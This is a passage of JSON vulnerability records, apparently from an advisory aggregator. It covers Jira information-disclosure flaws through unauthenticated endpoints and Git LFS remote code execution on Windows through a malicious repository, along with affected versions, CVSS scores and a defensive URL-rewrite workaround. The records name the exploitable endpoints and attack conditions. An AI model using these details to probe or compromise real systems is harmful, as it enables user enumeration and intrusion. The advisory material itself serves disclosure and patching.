\"atlassian_jira_win_installed.nbin\", \"atlassian_jira_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Atlassian JIRA\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Atlassian JIRA');\n\nconstraints = [\n { 'min_version' : '0', 'fixed_version' : '7.13.16' },\n { 'min_version' : '8.0.0', 'fixed_version' : '8.5.7' },\n { 'min_version' : '8.6.0', 'fixed_version' : '8.12.0' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-14T14:32:29", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 7.3.16, 8.x < 8.5.7 or 8.6.x < 8.12.0. It is, therefore, affected by an information disclosure vulnerability in the ViewUserHover.jspa endpoint allowing an unauthenticated user to enumerate users.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-02T00:00:00", "type": "nessus", "title": "Atlassian Jira < 7.13.16 Information Disclosure", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-14181"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112853", "href": "https://www.tenable.com/plugins/was/112853", "sourceData": "No source data", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2022-02-23T14:33:20", "description": "Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-16T00:00:00", "type": "attackerkb", "title": "CVE-2020-14181", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2020-09-19T00:00:00", "id": "AKB:0E7B1AC9-8AA4-4E6C-BB8C-A92654F9F59D", "href": "https://attackerkb.com/topics/oIM3R25bFH/cve-2020-14181", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "atlassian": [{"lastseen": "2022-01-05T06:15:04", "description": "Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.\r\n\r\nThis vulnerability was discovered by\u00a0Mikhail Klyuchnikov of\u00a0Positive Technologies.\r\n\r\n*Affected versions:*\r\n * version < 7.13.16\r\n * 8.0.0 \u2264 version < 8.5.7\r\n * 8.6.0 \u2264 version < 8.12.0\r\n\r\n*Fixed versions:*\r\n * 7.13.16\r\n * 8.5.7\r\n * 8.12.0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-16T03:13:06", "type": "atlassian", "title": "User Enumeration via /ViewUserHover.jspa - CVE-2020-14181", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2021-06-02T08:58:39", "id": "JRASERVER-71560", "href": "https://jira.atlassian.com/browse/JRASERVER-71560", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:40:42", "description": "Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.\r\n\r\nThis vulnerability was discovered by\u00a0Mikhail Klyuchnikov of\u00a0Positive Technologies.\r\n\r\n*Affected versions:*\r\n * version < 7.13.16\r\n * 8.0.0 \u2264 version < 8.5.7\r\n * 8.6.0 \u2264 version < 8.12.0\r\n\r\n*Fixed versions:*\r\n * 7.13.16\r\n * 8.5.7\r\n * 8.12.0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-16T03:13:06", "type": "atlassian", "title": "User Enumeration via /ViewUserHover.jspa - CVE-2020-14181", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181"], "modified": "2021-06-02T08:58:39", "id": "ATLASSIAN:JRASERVER-71560", "href": "https://jira.atlassian.com/browse/JRASERVER-71560", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-16T06:43:41", "description": "A remote code exeecution vulnerability was recently discovered in Git LFS:\r\n\r\nhttps://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html\r\n\r\nVulnerable git clients that clone a malicious repository are vulnerable to remote code execution. \r\n\r\nPlease determine if Bamboo is vulnerable. If it is definitively determined not to be affected, please close this as a false positive. If it is vulnerable, please work on remediating the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T17:02:11", "type": "atlassian", "title": "Git LFS on Windows vulnerable to remote code execution (CVE-2020-27955)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-16T05:28:41", "id": "ATLASSIAN:BAM-21284", "href": "https://jira.atlassian.com/browse/BAM-21284", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T07:09:13", "description": "A remote code exeecution vulnerability was recently discovered in Git LFS:\r\n\r\nhttps://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html\r\n\r\nVulnerable git clients that clone a malicious repository are vulnerable to remote code execution. \r\n\r\nPlease determine if Bamboo is vulnerable. If it is definitively determined not to be affected, please close this as a false positive. If it is vulnerable, please work on remediating the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T17:02:11", "type": "atlassian", "title": "Git LFS on Windows vulnerable to remote code execution (CVE-2020-27955)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-16T05:28:41", "id": "BAM-21284", "href": "https://jira.atlassian.com/browse/BAM-21284", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-01T10:42:52", "description": "h3. Summary\r\nAffected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint.\r\n\r\nh3. Affected versions:\r\n * version < 8.5.8\r\n * 8.6.0 \u2264 version < 8.11.1\r\n\r\nh4. Fixed versions:\r\n * 8.5.8\r\n * 8.11.1 and above, including 8.13.x\r\n \r\nh3. Note on fix\r\nWe've been unable to fully fix this issue due to short SLA and possible performance problems that fix could introduce. Please check the workaround section for mitigation steps. \r\n\r\nh3. Workaround - Fix Versions\r\nTo workaround this bug on Jira versions listed in \"fixed in versions\" above, one of the two techniques can be used:\r\n\r\n* Add the dark feature \"*public.access.disabled*\" (see [How to control anonymous user access in a public Jira instance|https://confluence.atlassian.com/jirakb/how-to-control-anonymous-user-access-in-a-public-jira-instance-975031479.html]) \r\n** In the fix versions above, the endpoint will now return 401 for anonymous users.\r\n* Add the newly added dark feature \"*com.atlassian.jira.plugin.issuenavigator.anonymousPreventCfData.enabled*\"\r\n** 200 will be returned, however the output will filter out all custom fields from response only when not authenticated\r\n** (!) The side effect of turning on \"com.atlassian.jira.plugin.issuenavigator.anonymousPreventCfData.enabled\" flag is that in basic mode of issue search (https://confluence.atlassian.com/jirasoftwareserver/basic-searching-939938708.html) there won't be any custom fields available for anonymous uses + there should be warning presented that \"You\u2019re not logged in, so you can\u2019t use custom fields in basic search. Log in or switch to advanced search.\".\r\nAdvanced mode should work fine (https://confluence.atlassian.com/jirasoftwareserver/advanced-searching-939938733.html).\r\n\r\nh3. Workaround - Non-fix versions\r\nIf you are running Jira that is below one of the \"fixed in versions\" above and should not be open to unauthenticated users, you may block the affected endpoint from anonymous users by using the URL rewrite system. \r\n\r\nFirst, add the *public.access.disabled* [dark feature|https://confluence.atlassian.com/jirakb/how-to-control-anonymous-user-access-in-a-public-jira-instance-975031479.html] as above. This blocks access to the Jira issue navigator when unauthenticated. \r\n\r\nThen, on each node, block the QueryComponent endpoints:\r\n # Edit the file JIRA_INSTALL/atlassian-jira/WEB-INF/urlrewrite.xml\r\n # Insert a new rule, directly underneath the last </rule> line (but before the </urlrewrite> line): \r\n{code}\r\n <rule>\r\n <from>(?s)/QueryComponent!.*\\.jspa</from>\r\n <condition type=\"session-attribute\" name=\"seraph_defaultauthenticator_user\" operator=\"notequal\">.+</condition>\r\n <set type=\"status\">403</set>\r\n <to>null</to>\r\n </rule>\r\n{code}\r\n# Restart the node\r\n\r\n(i) If for whatever reason you have scripted basic authentication calls to these endpoints (EG, python/curl requests), they will all be blocked, authenticated or not. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-10T04:31:31", "type": "atlassian", "title": "Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint - CVE-2020-14179", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14179", "CVE-2020-14181"], "modified": "2022-08-01T07:52:22", "id": "JRASERVER-71536", "href": "https://jira.atlassian.com/browse/JRASERVER-71536", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-11-29T16:45:03", "description": "h3. Summary\r\nAffected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint.\r\n\r\nh3. Affected versions:\r\n * version < 8.5.8\r\n * 8.6.0 \u2264 version < 8.11.1\r\n\r\nh4. Fixed versions:\r\n * 8.5.8\r\n * 8.11.1 and above, including 8.13.x\r\n \r\nh3. Note on fix\r\nWe've been unable to fully fix this issue due to short SLA and possible performance problems that fix could introduce. Please check the workaround section for mitigation steps. \r\n\r\nh3. Workaround - Fix Versions\r\nTo workaround this bug on Jira versions listed in \"fixed in versions\" above, one of the two techniques can be used:\r\n\r\n* Add the dark feature \"*public.access.disabled*\" (see [How to control anonymous user access in a public Jira instance|https://confluence.atlassian.com/jirakb/how-to-control-anonymous-user-access-in-a-public-jira-instance-975031479.html]) \r\n** In the fix versions above, the endpoint will now return 401 for anonymous users.\r\n* Add the newly added dark feature \"*com.atlassian.jira.plugin.issuenavigator.anonymousPreventCfData.enabled*\"\r\n** 200 will be returned, however the output will filter out all custom fields from response only when not authenticated\r\n** (!) The side effect of turning on \"com.atlassian.jira.plugin.issuenavigator.anonymousPreventCfData.enabled\" flag is that in basic mode of issue search (https://confluence.atlassian.com/jirasoftwareserver/basic-searching-939938708.html) there won't be any custom fields available for anonymous uses + there should be warning presented that \"You\u2019re not logged in, so you can\u2019t use custom fields in basic search. Log in or switch to advanced search.\".\r\nAdvanced mode should work fine (https://confluence.atlassian.com/jirasoftwareserver/advanced-searching-939938733.html).\r\n\r\nh3. Workaround - Non-fix versions\r\nIf you are running Jira that is below one of the \"fixed in versions\" above and should not be open to unauthenticated users, you may block the affected endpoint from anonymous users by using the URL rewrite system. \r\n\r\nFirst, add the *public.access.disabled* [dark feature|https://confluence.atlassian.com/jirakb/how-to-control-anonymous-user-access-in-a-public-jira-instance-975031479.html] as above. This blocks access to the Jira issue navigator when unauthenticated. \r\n\r\nThen, on each node, block the QueryComponent endpoints:\r\n # Edit the file JIRA_INSTALL/atlassian-jira/WEB-INF/urlrewrite.xml\r\n # Insert a new rule, directly underneath the last </rule> line (but before the </urlrewrite> line): \r\n{code}\r\n <rule>\r\n <from>(?s)/QueryComponent!.*\\.jspa</from>\r\n <condition type=\"session-attribute\" name=\"seraph_defaultauthenticator_user\" operator=\"notequal\">.+</condition>\r\n <set type=\"status\">403</set>\r\n <to>null</to>\r\n </rule>\r\n{code}\r\n# Restart the node\r\n\r\n(i) If for whatever reason you have scripted basic authentication calls to these endpoints (EG, python/curl requests), they will all be blocked, authenticated or not. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-10T04:31:31", "type": "atlassian", "title": "Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint - CVE-2020-14179", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14179", "CVE-2020-14181"], "modified": "2021-11-29T15:11:44", "id": "ATLASSIAN:JRASERVER-71536", "href": "https://jira.atlassian.com/browse/JRASERVER-71536", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-16T06:43:48", "description": "Git LFS is vulnerable to remote code execution on Windows (CVE-2021-21237):\r\n\r\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\r\n\r\nThis is the result of an incomplete fix for CVE-2020-27955.\r\n\r\nThis issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\r\n\r\nFix contains only changes to Windows AMIs used by Bamboo Elastic agents", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-10T11:05:09", "type": "atlassian", "title": "Bamboo for Windows uses a version of Git LFS vulnerable to remote code execution (CVE-2021-21237)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-09-16T05:28:41", "id": "ATLASSIAN:BAM-21267", "href": "https://jira.atlassian.com/browse/BAM-21267", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:38", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\u00a0*This is the result of an incomplete fix for CVE-2020-27955*\r\n\r\n*Affected versions:*\r\n * Version\u00a03.4.2 and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-26T17:00:21", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2021-21237", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:51:11", "id": "ATLASSIAN:SRCTREEWIN-13480", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T06:08:44", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\u00a0*This is the result of an incomplete fix for CVE-2020-27955*\r\n\r\n*Affected versions:*\r\n * Version\u00a03.4.2 and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-26T17:00:21", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2021-21237", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:51:11", "id": "SRCTREEWIN-13480", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T06:08:43", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\r\n\r\n*Affected versions:*\r\n * Version\u00a03.3.9\u00a0and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-07T17:07:10", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2020-27955", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:50:54", "id": "SRCTREEWIN-13410", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13410", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T07:09:14", "description": "Git LFS is vulnerable to remote code execution on Windows (CVE-2021-21237):\r\n\r\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\r\n\r\nThis is the result of an incomplete fix for CVE-2020-27955.\r\n\r\nThis issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\r\n\r\nFix contains only changes to Windows AMIs used by Bamboo Elastic agents", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T11:05:09", "type": "atlassian", "title": "Bamboo for Windows uses a version of Git LFS vulnerable to remote code execution (CVE-2021-21237)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", 